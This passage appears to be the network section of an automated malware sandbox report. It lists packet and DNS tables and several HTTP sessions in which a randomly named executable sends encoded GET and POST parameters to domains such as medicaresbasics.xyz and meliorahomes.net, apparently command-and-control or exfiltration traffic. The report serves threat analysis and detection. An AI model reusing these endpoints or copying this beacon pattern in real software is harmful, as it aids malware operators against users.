Jan 10, 2025 21:07:47.387625933 CET | 80 | 50260 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:48.289911985 CET | 80 | 50260 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:48.289966106 CET | 80 | 50260 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:48.290034056 CET | 50260 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:48.897829056 CET | 50260 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:49.919064045 CET | 50261 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:49.924061060 CET | 80 | 50261 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:49.924166918 CET | 50261 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:49.937206984 CET | 50261 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:49.942230940 CET | 80 | 50261 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:50.866570950 CET | 80 | 50261 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:50.866589069 CET | 80 | 50261 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:50.866664886 CET | 50261 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:51.444547892 CET | 50261 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:52.467340946 CET | 50262 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:52.472510099 CET | 80 | 50262 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:52.476746082 CET | 50262 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:52.487870932 CET | 50262 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:52.492788076 CET | 80 | 50262 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:52.492846966 CET | 80 | 50262 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:53.386699915 CET | 80 | 50262 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:53.386795044 CET | 80 | 50262 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:53.386866093 CET | 50262 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:53.991416931 CET | 50262 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:55.593588114 CET | 50263 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:55.598491907 CET | 80 | 50263 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:55.598997116 CET | 50263 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:55.606630087 CET | 50263 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:55.611419916 CET | 80 | 50263 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:56.497524023 CET | 80 | 50263 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:56.497565985 CET | 80 | 50263 | 8.217.17.192 | 192.168.2.7
Jan 10, 2025 21:07:56.497863054 CET | 50263 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:56.500451088 CET | 50263 | 80 | 192.168.2.7 | 8.217.17.192
Jan 10, 2025 21:07:56.505187988 CET | 80 | 50263 | 8.217.17.192 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 21:06:55.310641050 CET | 53 | 53759 | 162.159.36.2 | 192.168.2.7
Jan 10, 2025 21:06:55.906732082 CET | 53 | 63509 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 21:07:04.296108007 CET | 59987 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 21:07:04.430181026 CET | 53 | 59987 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 21:07:25.995064974 CET | 62182 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 21:07:26.007814884 CET | 53 | 62182 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 21:07:39.234316111 CET | 58058 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 21:07:39.243407965 CET | 53 | 58058 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 21:07:47.324507952 CET | 60396 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 21:07:47.363164902 CET | 53 | 60396 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 21:07:04.296108007 CET | 192.168.2.7 | 1.1.1.1 | 0x5205 | Standard query (0) | www.arcare.partners | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:25.995064974 CET | 192.168.2.7 | 1.1.1.1 | 0xcc2 | Standard query (0) | www.medicaresbasics.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:39.234316111 CET | 192.168.2.7 | 1.1.1.1 | 0xf465 | Standard query (0) | www.resellnexa.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:47.324507952 CET | 192.168.2.7 | 1.1.1.1 | 0xd816 | Standard query (0) | www.meliorahomes.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 21:07:04.430181026 CET | 1.1.1.1 | 192.168.2.7 | 0x5205 | No error (0) | www.arcare.partners | arcare.partners | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:07:04.430181026 CET | 1.1.1.1 | 192.168.2.7 | 0x5205 | No error (0) | arcare.partners | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:04.430181026 CET | 1.1.1.1 | 192.168.2.7 | 0x5205 | No error (0) | arcare.partners | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:26.007814884 CET | 1.1.1.1 | 192.168.2.7 | 0xcc2 | No error (0) | www.medicaresbasics.xyz | medicaresbasics.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 21:07:26.007814884 CET | 1.1.1.1 | 192.168.2.7 | 0xcc2 | No error (0) | medicaresbasics.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:26.007814884 CET | 1.1.1.1 | 192.168.2.7 | 0xcc2 | No error (0) | medicaresbasics.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:39.243407965 CET | 1.1.1.1 | 192.168.2.7 | 0xf465 | Name error (3) | www.resellnexa.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 21:07:47.363164902 CET | 1.1.1.1 | 192.168.2.7 | 0xd816 | No error (0) | www.meliorahomes.net | | 8.217.17.192 | A (IP address) | IN (0x0001) | false
                                                • www.arcare.partners
                                                • www.medicaresbasics.xyz
                                                • www.meliorahomes.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 50255 | 3.33.130.190 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:04.713511944 CET | 521 | OUT | GET /0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41 HTTP/1.1
                                                Host: www.arcare.partners
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Jan 10, 2025 21:07:05.933609009 CET | 394 | IN | HTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>
Jan 10, 2025 21:07:05.935055017 CET | 394 | IN | HTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>
Jan 10, 2025 21:07:05.935079098 CET | 394 | IN | HTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:05 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 52 41 41 39 35 2b 53 45 71 35 4a 44 45 64 4a 46 64 33 70 70 6c 6d 59 78 36 38 65 59 2f 78 42 71 41 30 71 67 32 44 59 74 67 37 65 71 43 69 4a 67 44 74 37 6e 48 71 69 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 50256 | 3.33.130.190 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:26.025995016 CET | 805 | OUT | POST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 38 37 44 6c 37 58 35 41 61 4b 59 75 65 6a 48 67 65 62 6c 4c 72 6b 48 31 39 4b 76 62 79 32 41 6f 52 4c 66 59 57 4e 55 76 77 73 49 6e 38 2b 77 58 67 3d 3d
                                                Data Ascii: A2jpdtl=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX87Dl7X5AaKYuejHgeblLrkH19Kvby2AoRLfYWNUvwsIn8+wXg==
Jan 10, 2025 21:07:26.470170021 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 50257 | 3.33.130.190 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:28.581547976 CET | 825 | OUT | POST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 240
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 31 38 6d 48 37 48 37 47 62 39 57 51 62 51 4b 50 6b 59 64 4e 58 4a 61 67 37 72 39 46 52 78 38 69 2f 36 6e 64 6c 6f 69 63 35 4b 42 34 48 77 36 48 52 77 70 73 7a 74 34 51 31 6d 42 75 5a 32 52 71 38 43 39 61 6b 77 6e 78 34 4d 7a 66 6d 57 6c 32 43 4e 72 4b 6f 30 46 6b 53 35 57 54 63 32 45 42 6f 50 70 39 58 67 51 33 34 30 4d 41 33 49 4f 4a 6b 62 69 76 78 53 59 63 62 6a 38 74 48 45 4d 74 66 37 72 6f 69 6c 36 38 58 4a 56 36 63 38 78 2f 75 5a 4d 55 72 31 71 51 50 48 56 30 35 31 77 48 4a 69 71 75 66 30 42 63 63 4b 4f 76 44 4d 34 2f 57 35 56 38 74 77 42 50 32 62 6e 66 59 3d
                                                Data Ascii: A2jpdtl=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo18mH7H7Gb9WQbQKPkYdNXJag7r9FRx8i/6ndloic5KB4Hw6HRwpszt4Q1mBuZ2Rq8C9akwnx4MzfmWl2CNrKo0FkS5WTc2EBoPp9XgQ340MA3IOJkbivxSYcbj8tHEMtf7roil68XJV6c8x/uZMUr1qQPHV051wHJiquf0BccKOvDM4/W5V8twBP2bnfY=
Jan 10, 2025 21:07:29.036501884 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 50258 | 3.33.130.190 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:31.124914885 CET | 1838 | OUT | POST /fm31/ HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.medicaresbasics.xyz
                                                Referer: http://www.medicaresbasics.xyz/fm31/
                                                Cache-Control: no-cache
                                                Content-Length: 1252
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 39 38 6c 30 44 48 70 31 44 39 58 51 62 51 4a 50 6b 5a 64 4e 57 56 61 67 6a 76 39 46 64 50 38 6b 37 36 31 76 74 6f 6b 6f 56 4b 55 49 48 77 79 6e 52 74 6d 4d 7a 43 34 51 6c 63 42 75 4a 32 52 71 38 43 39 63 41 77 33 54 63 4d 38 2f 6d 4a 69 32 43 4a 76 4b 70 68 46 6b 71 70 57 53 70 44 46 77 55 50 6f 65 76 67 63 6b 41 30 41 41 33 4b 50 4a 6c 47 69 76 38 4b 59 66 76 76 38 74 62 69 4d 71 7a 37 70 4d 37 64 69 6f 50 64 47 72 73 59 78 39 47 62 4a 33 7a 66 79 7a 72 4b 64 6b 6c 33 7a 45 78 50 71 4d 79 35 4b 4a 46 39 52 74 43 2f 39 2b 53 61 61 37 31 35 57 71 69 75 39 6f 76 7a 4e 6d 58 47 5a 36 69 72 68 41 51 78 70 62 4f 39 6f 59 53 55 2f 38 78 66 68 43 5a 6e 63 70 4e 41 64 74 56 32 30 5a 55 48 36 49 30 6c 35 76 71 71 30 55 73 6c 46 72 50 36 67 7a 67 77 5a 76 35 4c 2b 58 6f 2b 49 68 6e 37 73 64 6d 6c 42 4c 56 70 73 65 51 65 69 30 66 38 71 56 61 4f 36 7a 50 39 44 79 [TRUNCATED]
Data Ascii: A2jpdtl= [TRUNCATED]
Jan 10, 2025 21:07:31.570842028 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                content-length: 0
                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 50259 | 3.33.130.190 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:33.665636063 CET | 525 | OUT | GET /fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41 HTTP/1.1
                                                Host: www.medicaresbasics.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Jan 10, 2025 21:07:34.215807915 CET | 394 | IN | HTTP/1.1 200 OK
                                                content-type: text/html
                                                date: Fri, 10 Jan 2025 20:07:34 GMT
                                                content-length: 273
                                                connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 32 6a 70 64 74 6c 3d 44 75 4c 75 2f 5a 4a 45 5a 30 76 73 61 37 4e 4d 57 36 59 31 6c 75 77 4d 73 54 70 55 6a 54 69 61 7a 78 69 4b 73 46 71 4d 6a 6f 63 4a 6d 55 2b 57 7a 30 6e 2b 53 46 44 77 4a 72 42 41 57 34 4c 7a 4a 57 4c 5a 30 30 67 67 74 52 33 46 6c 4e 39 47 75 70 70 47 64 72 2f 39 34 6d 68 78 75 73 44 4d 35 68 4e 46 47 66 30 50 56 70 4e 6a 79 37 6f 46 68 42 4d 52 33 76 61 66 6c 47 44 4f 72 63 46 68 61 53 75 4a 54 69 77 44 4d 57 55 6d 26 37 70 47 3d 42 68 51 34 31 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 50260 | 8.217.17.192 | 80 | 7088 | C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 21:07:47.382741928 CET | 796 | OUT | POST /ir1u/ HTTP/1.1
                                                Host: www.meliorahomes.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Origin: http://www.meliorahomes.net
                                                Referer: http://www.meliorahomes.net/ir1u/
                                                Cache-Control: no-cache
                                                Content-Length: 220
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                Data Raw: 41 32 6a 70 64 74 6c 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 68 38 6d 32 31 4e 53 2b 51 35 7a 66 35 4c 68 66 57 78 66 6f 43 49 67 4d 79 31 41 55 62 53 4a 74 56 6f 4b 33 65 64 6f 6e 43 6d 46 6a 30 52 30 53 32 44 6f 4c 5a 71 55 4f 34 4a 76 59 78 68 55 37 33 4a 78 38 4c 63 2f 2f 37 74 47 53 62 6d 32 4f 4c 6b 47 49 50 50 70 61 71 49 4b 4f 42 34 48 62 4b 48 47 48 52 4f 6a 62 38 77 55 71 41 75 7a 63 6f 7a 66 68 2b 4d 43 41 4b 63 78 61 46 37 62 2b 73 56 43 6f 33 52 54 69 79 6c 78 33 59 69 6f 36 70 37 64 69 76 6b 77 53 32 34 35 33 4f 2b 43 71 46 75 4b 6e 67 55 38 37 46 7a 55 39 51 79 4b 39 62 78 6d 67 5a 55 6e 47 41 67 42 71 66 45 6e 74 51 45 2f 46 6a 51 3d 3d
                                                Data Ascii: A2jpdtl=jai/NoPHoBCQh8m21NS+Q5zf5LhfWxfoCIgMy1AUbSJtVoK3edonCmFj0R0S2DoLZqUO4JvYxhU73Jx8Lc//7tGSbm2OLkGIPPpaqIKOB4HbKHGHROjb8wUqAuzcozfh+MCAKcxaF7b+sVCo3RTiylx3Yio6p7divkwS2453O+CqFuKngU87FzU9QyK9bxmgZUnGAgBqfEntQE/FjQ==
Jan 10, 2025 21:07:48.289911985 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                Date: Fri, 10 Jan 2025 20:07:48 GMT
                                                Server: Apache/2.4.6 (CentOS) PHP/7.2.34
                                                Content-Length: 203
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


Session ID: 6
Source IP: 192.168.2.7
Source Port: 50261
Destination IP: 8.217.17.192
Destination Port: 80
PID: 7088
Process: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe

Timestamp | Bytes transferred | Direction | Data
